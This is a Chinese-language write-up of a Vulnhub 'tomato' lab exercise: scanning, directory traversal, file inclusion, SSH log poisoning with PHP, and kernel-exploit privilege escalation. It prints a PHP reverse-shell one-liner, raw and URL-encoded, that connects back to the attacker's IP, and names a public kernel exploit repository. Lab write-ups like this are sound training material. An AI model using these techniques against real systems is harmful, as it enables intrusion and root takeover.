Vulnhub靶机tomato渗透

靶机介绍
官方下载地址：http://www.vulnhub.com/entry/tomato-1,557/
该靶机目标是获取root目录下的flag，难度是中等到困难

运行环境：
靶机：网络连接方式设为自动桥接，IP地址：192.168.1.86
攻击机：通网段下的kali linux，IP地址：192.168.1.44
开始渗透
运行靶机

获取IP地址

扫描端口及其服务

扫描目录

开始访问
80端口首页是一张图片，源代码也没有获取有用的信息

server-status是一个目录
antibot_image发现目录遍历漏洞

在http://192.168.1.86/antibot_image/antibots/info.php的源代码当中发现了文件包含的命令

使用文件包含，可以包含成功

查看ssh服务的日志文件，在日志里面发现tomato用户

尝试使用php代码作为用户名进行注入

判断是否注入成功，加入参数执行发现执行成功

既然php代码可以注入成功，就可以利用php来反弹shell
开启监听，执行下面这条语句，需要进行url编码否则不会被解析
源代码：php±r+’$sock=fsockopen(“192.168.1.44”,4444);exec("/bin/sh±i+<&3+>&3+2>&3");’
url编码之后：php±r+%27%24sock%3dfsockopen(%22192.168.1.44%22%2c4444)%3bexec(%22%2fbin%2fsh±i+%3c%263+%3e%263+2%3e%263%22)%3b%27

反弹成功，利用python交互，打开终端

想办法提权，
查了一个系统版本，再使用searchsploit查了一下发现有可利用的漏洞


使用44300.c提权失败了，经过百度之后使用github上面的一个脚本
https://github.com/kkamagui/linux-kernel-exploits
由于靶机的gcc命令不能使用所以在kali将脚本进行编译，再下载到靶机上面

将编译好的文件放到临时的http服务上面



下载成功之后赋予文件权限并执行该文件


已经提权到root
可能是因为物理机电脑CPU不兼容，虚拟机报错，无法查看flag
靶机到这里已经算完成了